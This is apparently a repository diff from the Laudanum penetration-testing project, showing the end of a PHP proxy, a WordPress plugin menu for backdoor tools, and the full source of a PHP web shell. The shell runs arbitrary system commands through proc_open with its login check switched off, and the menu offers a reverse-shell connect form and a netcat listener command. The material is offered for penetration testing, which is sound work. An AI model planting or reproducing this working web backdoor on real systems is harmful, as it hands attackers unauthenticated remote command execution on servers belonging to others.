<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
function init() {
document.proxy.url.focus();
}
</script>
</head>
<body onload="init()">
<h1>Laudanum PHP Proxy</h1>
<form method="GET" name="proxy">
<input type="text" name="laudurl" size="70">
</form>
<hr>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Written by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>
<?php
} else {
$url_c = geturlarray($url);
$params = array_merge($_GET, $_POST);
//don't pass throught the parameter we are using
unset($params["laudurl"]);
//create the query or post parameters
$query = http_build_query($params);
if ($query != "") {
$url_c["query"] = $query;
}
//get the files
$fp = fopen(buildurl($url_c), "rb");
// use the headers, except the response code which is popped off the array
$headers = $http_response_header;
// pop
array_shift($headers);
// fix cookies
$headers = rewritecookies($headers);
$ctype = getcontenttype($headers);
$cencoding = getcontentencoding($headers);
// we will remove gzip encoding later, but we need to remove the header now
// before it is added to the response.
if ($cencoding == "gzip")
$headers = removeheader("Content-Encoding", $headers);
// set headers for response to client
if (preg_match("/text|image/", $ctype)) {
header_remove();
// the number of headers can change due to replacement
$i = 0;
while ($i < count($headers)) {
if (strpos($headers[$i], "Set-Cookie:") == false)
// replace headers
header($headers[$i], true);
else
// if it is the first cookie, replace all the others. Otherwise add
header($headers[$i], false);
$i++;
}
} else {
header("Content-Disposition: attachment; filename=" . getfilename($url_c));
}
// get data
if (preg_match("/text/",$ctype)) { //text
//it is a text format: html, css, js
$data = "";
while (!feof($fp)) {
$data .= fgets($fp, 4096);
}
// uncompress it so it can be rewritten
if ($cencoding == "gzip")
$data = compatible_gzinflate($data);
// rewrite all the links and such
echo rewrite($data, $url_c);
} else {
// binary format or something similar, let it go through
fpassthru($fp);
fclose($fp);
}
}
?>

67
web-backdoors/wordpress/templates/settings.php Normal file
View file

@ -0,0 +1,67 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides a convenient menu of Laudanum tools from a Word Press settings
*** page.
***
*** Written by Jason Gillam <jgillam@secureideas.com>
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
?>
<div class="wrap">
<h2>Laudanum Tools</h2>
<ul>
<li><a href="<?php echo plugins_url('shell.php', __FILE__);?>">Shell</a> </li>
<li><a href="<?php echo plugins_url('dns.php', __FILE__);?>">DNS</a> </li>
<li><a href="<?php echo plugins_url('host.php', __FILE__);?>">Host Lookup</a> </li>
<li><a href="<?php echo plugins_url('file.php', __FILE__);?>">File Browser</a> </li>
<li><a href="<?php echo plugins_url('proxy.php', __FILE__);?>">Proxy</a> </li>
<li>Reverse Shell -
<form action="<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>" method="post">
IP: <input name="ip" type="text" value="127.0.0.1">
Port: <input name="port" type="text" value="8888">
<input type="submit" value="Connect"></p>
</form></li>
<!--<li><a href="<?php echo plugins_url('php-reverse-shell.php', __FILE__);?>">Reverse Shell (requires hard-coded config)</a> </li>-->
</form>
<li><a href="<?php echo plugins_url('killnc.php', __FILE__);?>">kill nc (recover if nc screws up your shell)</a> </li>
</ul>
* for reverse shell, use netcat to listen, e.g. "nc -v -n -l 8888"
</div>

389
web-backdoors/wordpress/templates/shell.php Normal file
View file

@ -0,0 +1,389 @@
<?php
/* *****************************************************************************
***
*** Laudanum Project
*** A Collection of Injectable Files used during a Penetration Test
***
*** More information is available at:
*** http://laudanum.secureideas.net
*** laudanum@secureideas.net
***
*** Project Leads:
*** Kevin Johnson <kjohnson@secureideas.net>
*** Tim Medin <tim@counterhack.com>
***
*** Copyright 2014 by Kevin Johnson and the Laudanum Team
***
********************************************************************************
***
*** This file provides shell access to the system. It is built based on the 2.1
*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler
*** <mgeisler[at]mgeisler.net>
***
*** Updated by Tim Medin
***
********************************************************************************
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
***
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
*** GNU General Public License for more details.
***
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum PHP Shell Access</title>
</head>
<body>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
<hr>
<address>
Copyright &copy; 2014, <a
href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>');
}
}
// set_error_handler('wpl_error_handler');
function logout() {
$_SESSION = array('authenticated' => false);
if (isset($_COOKIE[session_name()]))
setcookie(session_name(), '', time()-42000, '/');
session_destroy();
}
function wpl_stripslashes_deep($value) {
if (is_array($value))
return array_map('stripslashes_deep', $value);
else
return stripslashes($value);
}
if (get_magic_quotes_gpc())
$_POST = stripslashes_deep($_POST);
/* Initialize some variables we need again and again. */
//$username = isset($_POST['username']) ? $_POST['username'] : '';
//$password = isset($_POST['password']) ? $_POST['password'] : '';
//$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
$command = isset($_POST['command']) ? $_POST['command'] : '';
$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
///* Default settings --- these settings should always be set to something. */
//$default_settings = array('home-directory' => '.');
///* Merge settings. */
//$ini['settings'] = array_merge($default_settings, $ini['settings']);
session_start();
/* Delete the session data if the user requested a logout. This leaves the
* session cookie at the user, but this is not important since we
* authenticates on $_SESSION['authenticated']. */
if (isset($_POST['logout']))
logout();
///* Attempt authentication. */
//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
// isset($ini['users'][$username])) {
// if (strchr($ini['users'][$username], ':') === false) {
// // No seperator found, assume this is a password in clear text.
// $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
// } else {
// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
// }
//}
/* Attempt authentication. */
if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
$_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));
/* Enforce default non-authenticated state if the above code didn't set it
* already. */
if (!isset($_SESSION['authenticated']))
$_SESSION['authenticated'] = false;
if(true) {
//if ($_SESSION['authenticated']) {
/* Initialize the session variables. */
if (empty($_SESSION['cwd'])) {
$_SESSION['cwd'] = '.';
$_SESSION['history'] = array();
$_SESSION['output'] = '';
}
if (!empty($command)) {
/* Save the command for late use in the JavaScript. If the command is
* already in the history, then the old entry is removed before the
* new entry is put into the list at the front. */
if (($i = array_search($command, $_SESSION['history'])) !== false)
unset($_SESSION['history'][$i]);
array_unshift($_SESSION['history'], $command);
/* Now append the commmand to the output. */
$_SESSION['output'] .= '$ ' . $command . "\n";
/* Initialize the current working directory. */
if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
} elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs[1]{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
}
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
}
} elseif (trim($command) == 'exit') {
logout();
} else {
/* The command is not an internal command, so we execute it after
* changing the directory and save the output. */
chdir($_SESSION['cwd']);
// We canot use putenv() in safe mode.
if (!ini_get('safe_mode')) {
// Advice programs (ls for example) of the terminal size.
putenv('ROWS=' . $rows);
putenv('COLUMNS=' . $columns);
}
/* Alias expansion. */
$length = strcspn($command, " \t");
$token = substr($command, 0, $length);
if (isset($ini['aliases'][$token]))
$command = $ini['aliases'][$token] . substr($command, $length);
$io = array();
$p = proc_open($command,
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
$io);
/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
ENT_COMPAT, 'UTF-8');
}
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
ENT_COMPAT, 'UTF-8');
}
fclose($io[1]);
fclose($io[2]);
proc_close($p);
}
}
/* Build the command history for use in the JavaScript */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
}
}
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum Shell</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
<?php if (true) { ?>
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}
}
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}
<?php } else { ?>
function init() {
document.shell.username.focus();
}
<?php } ?>
</script>
</head>
<body onload="init()">
<h1>Laudanum Shell</h1>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
<?php
if (false) {
/* Genereate a new nounce every time we preent the login page. This binds
* each login to a unique hit on the server and prevents the simple replay
* attack where one uses the back button in the browser to replay the POST
* data from a login. */
$_SESSION['nounce'] = mt_rand();
?>
<fieldset>
<legend>Authentication</legend>
<?php
if (false)
echo ' <p class="error">Login failed, please try again:</p>' . "\n";
else
echo " <p>Please login:</p>\n";
?>
<p>Username: <input name="username" type="text" value="<?php echo $username
?>"></p>
<p>Password: <input name="password" type="password"></p>
<p><input type="submit" value="Login"></p>
<input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>">
</fieldset>
<?php } else { /* Authenticated. */ ?>
<fieldset>
<legend>Current Working Directory: <code><?php
echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8');
?></code></legend>
<div id="terminal">
<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>">
<?php
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $rows+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea>
<p id="prompt">
$&nbsp;<input name="command" type="text"
onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1">
</p>
</div>
<p>
<span style="float: right">Size: <input type="text" name="rows" size="2"
maxlength="3" value="<?php echo $rows ?>"> &times; <input type="text"
name="columns" size="2" maxlength="3" value="<?php echo $columns
?>"></span>
<input type="submit" value="Execute Command">
<input type="submit" name="logout" value="Logout">
</p>
</fieldset>
<?php } ?>
</form>
<hr/>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Updated by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>
</body>
</html>